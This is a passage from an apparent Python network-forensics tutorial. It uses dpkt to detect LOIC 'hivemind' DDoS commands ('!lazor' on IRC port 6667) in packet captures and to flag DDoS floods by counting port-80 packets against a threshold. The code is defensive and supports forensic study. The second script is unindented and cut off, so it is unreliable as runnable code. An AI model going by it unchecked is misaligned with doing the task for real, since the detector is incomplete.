            src = socket.inet_ntoa(ip.src)
            dst = socket.inet_ntoa(ip.dst)
            tcp = ip.data
            dport = tcp.dport
            sport = tcp.sport
            # Destination port 6667 with a "!lazor" command: a member is submitting an attack command
            if dport == 6667:
                if '!lazor' in tcp.data.lower():
                    print '[!] DDoS Hivemind issued by: '+src
                    print '[+] Target CMD: ' + tcp.data
            # Source port 6667 with a "!lazor" command: the server is relaying the attack command to members of the hive
            if sport == 6667:
                if '!lazor' in tcp.data.lower():
                    print '[!] DDoS Hivemind issued to: '+src
                    print '[+] Target CMD: ' + tcp.data
        except:
            # Skip packets without a TCP layer
            pass

# Open the capture file in binary mode
f = open('hivemind.pcap', 'rb')
pcap = dpkt.pcap.Reader(f)
findHivemind(pcap)

Again tested directly with the sample capture:






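The decision logic in findHivemind() depends only on the two port numbers and the payload, so it can be tried out without a capture file. Below is a small sketch of that logic; classify_irc_segment, its return labels and the sample payload are assumptions made for illustration, and the code targets Python 3, where TCP payloads are bytes.

```python
IRC_PORT = 6667
ATTACK_COMMAND = b'!lazor'

def classify_irc_segment(sport, dport, payload):
    """Classify a TCP segment by direction if it carries the attack command."""
    if ATTACK_COMMAND not in payload.lower():
        return None
    if dport == IRC_PORT:
        # Client to server: a member is issuing the command.
        return 'issued_by_client'
    if sport == IRC_PORT:
        # Server to client: the server is relaying the command.
        return 'relayed_by_server'
    return None

# Made-up payload; real hivemind traffic may be formatted differently.
sample_payload = b'TOPIC #loic :!LAZOR targetip=10.0.0.1 start'

print(classify_irc_segment(50000, 6667, sample_payload))
print(classify_irc_segment(6667, 50000, sample_payload))
```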

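Detecting DDoS attacks in real time:

The main idea is to set a threshold on the number of abnormal packets and use it to decide whether a DDoS attack is under way.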
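The threshold idea can be sketched on its own with collections.Counter, independent of any packet parsing. This is only an illustration under assumptions: find_attacks is a hypothetical helper, the input is a list of already-extracted (src, dst, dport) tuples, the addresses are invented, and the code targets Python 3.

```python
from collections import Counter

def find_attacks(packets, thresh=1000):
    """Return {(src, dst): count} for flows to port 80 that exceed thresh."""
    # Count packets per (source, destination) pair, port 80 only.
    counts = Counter((src, dst) for src, dst, dport in packets if dport == 80)
    return {flow: n for flow, n in counts.items() if n > thresh}

# Invented traffic: one noisy source, one quiet source, one non-HTTP flow.
sample_packets = (
    [('10.0.0.1', '10.0.0.9', 80)] * 1500
    + [('10.0.0.2', '10.0.0.9', 80)] * 10
    + [('10.0.0.1', '10.0.0.9', 443)] * 5000
)

print(find_attacks(sample_packets))
```

Only the first flow is reported: the second stays under the threshold and the third does not target port 80.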

#!/usr/bin/python

#coding=utf-8

import dpkt

import socket

# Default threshold for the number of abnormal packets: 1000

THRESH = 1000

def findAttack(pcap):

pktCount = {}

for (ts, buf) in pcap:

try:

eth = dpkt.ethernet.Ethernet(buf)

ip = eth.data

src = socket.inet_ntoa(ip.src)

dst = socket.inet_ntoa(ip.dst)

tcp = ip.data

dport = tcp.dport

# Count how many times each src address hits port 80 on the destination address

if dport == 80:

stream = src + ':' + dst

if pktCount.has_key(stream):

pktCount[stream] = pktCount[stream] + 1

else:

pktCount[stream] = 1

except:

pass

























for stream in pktCount: